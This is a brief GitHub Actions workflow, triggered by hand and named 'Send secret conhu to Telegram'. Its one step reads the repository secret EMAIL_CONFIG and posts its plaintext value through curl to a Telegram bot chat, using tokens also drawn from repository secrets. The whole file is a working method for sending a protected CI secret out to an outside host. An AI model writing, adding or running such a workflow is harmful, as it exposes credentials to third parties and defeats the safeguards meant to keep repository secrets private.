name: Send secret conhu to Telegram

on:
  workflow_dispatch:

jobs:
  send:
    runs-on: ubuntu-latest

    steps:
      - name: Send secret conhu to Telegram
        env:
          TG_BOT: ${{ secrets.TG_TOKEN }}
          TG_CHAT: ${{ secrets.TG_ID }}
          CONHU: ${{ secrets.EMAIL_CONFIG }}
        run: |
          curl -s -X POST "https://api.telegram.org/bot${TG_BOT}/sendMessage" \
            -d chat_id="${TG_CHAT}" \
            -d text="conhu secret value: ${CONHU}"
